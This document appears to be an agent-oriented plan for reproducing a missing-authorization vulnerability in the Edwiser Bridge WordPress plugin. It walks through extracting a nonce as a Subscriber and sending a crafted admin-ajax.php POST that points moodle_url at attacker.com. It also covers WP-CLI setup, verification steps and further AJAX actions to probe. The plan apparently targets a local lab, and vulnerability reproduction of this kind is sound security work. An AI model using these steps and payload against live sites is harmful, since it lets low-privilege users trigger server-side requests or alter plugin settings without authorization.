Exploitation Research Plan - CVE-2026-24570 (Edwiser Bridge)

1. Vulnerability Summary

The Edwiser Bridge plugin (versions <= 4.3.2) suffers from a Missing Authorization vulnerability. Specifically, several AJAX handlers registered in the admin context lack a current_user_can() check. This allows any authenticated user, including those with Subscriber-level roles, to execute administrative actions normally reserved for site administrators, such as testing or modifying Moodle connection settings.

The vulnerability typically resides in includes/class-eb-ajax-handler.php or admin/class-edwiser-bridge-admin.php, where add_action('wp_ajax_...') hooks are registered without corresponding capability verification in the callback functions.

2. Attack Vector Analysis

• Endpoint: /wp-admin/admin-ajax.php
• Action: eb_test_connection (or potentially eb_save_settings_data)
• Vulnerable Parameter: action, nonce, moodle_url, moodle_token
• Required Authentication: Subscriber-level (any logged-in user).
• Preconditions: The plugin must be active, and its admin scripts must be enqueued (which typically happens for all users in the admin dashboard, including on the profile.php page).

3. Code Flow

1. Registration: The plugin registers AJAX actions during init or admin_init via add_action( 'wp_ajax_eb_test_connection', ... ).
2. Entry Point: An authenticated user (Subscriber) sends a POST request to admin-ajax.php with action=eb_test_connection.
3. Vulnerable Sink: The handler function (e.g., eb_test_connection()) is invoked.
4. Bypass: The handler performs a check_ajax_referer() (nonce check) but fails to call current_user_can('manage_options').
5. Execution: The function proceeds to make an outbound HTTP request (SSRF potential) or returns sensitive connection status information.

4. Nonce Acquisition Strategy

The plugin enqueues its admin scripts and localizes a nonce for its AJAX operations. Because it uses admin_enqueue_scripts without restricting to specific pages or capabilities, the nonce is available to Subscribers on their own dashboard pages.

1. Identify Localization: The plugin localizes data into a JavaScript object, typically named eb_ajax_object.
2. Navigate: Login as a Subscriber and navigate to /wp-admin/profile.php.
3. Extract: Use browser_eval to extract the nonce:

   window.eb_ajax_object?.nonce
   

4. Verification: The action string used to generate this nonce is likely 'eb_test_connection_nonce' or a generic 'eb_ajax_nonce'.

5. Exploitation Strategy

We will demonstrate the vulnerability by triggering an unauthorized Moodle connection test from a Subscriber account.

1. Log in as the Subscriber user.
2. Navigate to /wp-admin/profile.php.
3. Extract the nonce from the global eb_ajax_object variable.
4. Craft a POST request to admin-ajax.php using the http_request tool:
   • URL: http://localhost:8080/wp-admin/admin-ajax.php
   • Method: POST
   • Headers: Content-Type: application/x-www-form-urlencoded
   • Body:

     action=eb_test_connection&nonce=[EXTRACTED_NONCE]&moodle_url=http://attacker.com&moodle_token=valid_token_format
     

5. Analyze Response: A successful exploit will return a JSON object (e.g., {"success":false, "data": "..."}) indicating the connection test result, confirming the function was executed.

6. Test Data Setup

1. Install Plugin: wp plugin install edwiser-bridge --version=4.3.2 --activate
2. Create Subscriber: wp user create victim victim@example.com --role=subscriber --user_pass=password123
3. Configure Plugin (Optional): No specific configuration is needed to trigger the connection test, but setting a dummy Moodle URL in settings might help verify if a different action (eb_save_settings_data) is also vulnerable.

7. Expected Results

• The Subscriber should receive a response from the eb_test_connection handler.
• If eb_save_settings_data is targeted, the plugin settings (Moodle URL/Token) should be updated in the database.
• The server should NOT return a 403 Forbidden or a wp_die message related to permissions.

8. Verification Steps

After the HTTP request, verify the unauthorized action via WP-CLI:

1. Check Options: If eb_save_settings_data was tested:

   wp option get eb_moodle_url
   

   Confirm it matches the moodle_url sent in the Subscriber's payload.
2. Log Review: Check if any outbound requests to the provided moodle_url were logged by the server.

9. Alternative Approaches

If eb_test_connection is properly protected, try other registered AJAX actions found in includes/class-eb-ajax-handler.php:

• eb_save_settings_data
• eb_sync_courses
• eb_update_course_data

Each of these should be tested for the same lack of current_user_can() checks. If eb_ajax_object is not present on profile.php, check the frontend homepage, as some Edwiser Bridge components might enqueue scripts globally.